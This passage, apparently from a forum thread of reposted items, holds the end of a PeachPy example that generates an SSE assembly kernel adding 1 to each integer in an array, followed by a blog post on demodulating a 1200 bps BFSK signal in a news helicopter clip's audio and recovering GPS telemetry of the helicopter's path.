peachpy.c.Type("uint32_t*")) len_argument = peachpy.c.Parameter("length", peachpy.c.Type("size_t")) # This optimized kernel will target Intel Nehalem processors. Any instructions which are not # supported on Intel Nehalem (e.g. AVX instructions) will generate an error. If you don't have # a particular target in mind, use "Unknown" with Function(assembler, "add_1", (src_argument, dst_argument, len_argument), "Nehalem"): # Load arguments into registers srcPointer = GeneralPurposeRegister64() LOAD.PARAMETER( srcPointer, src_argument ) dstPointer = GeneralPurposeRegister64() LOAD.PARAMETER( dstPointer, dst_argument ) length = GeneralPurposeRegister64() LOAD.PARAMETER( length, len_argument ) # Main processing loop. Length must be a multiple of 4. LABEL( 'loop' ) x = SSERegister() MOVDQU( x, [srcPointer] ) ADD( srcPointer, 16 ) # Add 1 to x PADDD( x, Constant.uint32x4(1) ) MOVDQU( [dstPointer], x ) ADD( dstPointer, 16 ) SUB( length, 4 ) JNZ( 'loop' ) RETURN() print assembler Sursa: https://bitbucket.org/MDukhan/peachpy
-
[h=3]Mystery signal from a helicopter[/h] Last night, YouTube suggested for me. It was a raw clip from a news helicopter filming a police chase in Kansas City, Missouri. I quickly noticed a weird interference in the audio, especially the left channel, and thought it must be caused by the chopper's engine. I turned up the volume and realized it's not interference at all, but a mysterious digital signal! And off we went again. The signal sits alone on the left audio channel, so I can completely isolate it. Judging from the spectrogram, the modulation scheme seems to be BFSK, switching the carrier between 1200 and 2200 Hz. I demodulated it by filtering it with a lowpass and highpass sinc in SoX and comparing outputs. Now I had a bitstream at 1200 bps. The bitstream consists of packets of 47 bytes each, synchronized by start and stop bits and separated by repetitions of the byte 0x80. Most bits stay constant during the video, but three distinct groups of bytes contain varying data, marked blue below: What could it be? Location telemetry from the helicopter? Information about the camera direction? Video timestamps? The first guess seems to be correct. It is supported by the relationship of two of the three byte groups. If the 4 first bits of each byte are ignored, the data forms a smooth gradient of three-digit numbers in base-10. When plotted parametrically, they form an intriguing winding curve. It is very similar to this plot of the car's position (blue, yellow) along with viewing angles from the helicopter (green), derived from the video by magical image analysis (only the first few minutes shown): When the received curve is overlaid with the car's location trace, we see that 100 steps on the curve scale corresponds to exactly 1 minute of arc on the map! Using this relative information, and the fact that the helicopter circled around the police station in the end, we can plot all the received data points in Google Earth to see the location trace of the helicopter: Update: Apparently the video downlink to ground was transmitted using a transmitter similar to Nucomm Skymaster TX that is able to send live GPS coordinates. And this is how they seem to do it. Posted by Oona Räisänen Sursa: absorptions: Mystery signal from a helicopter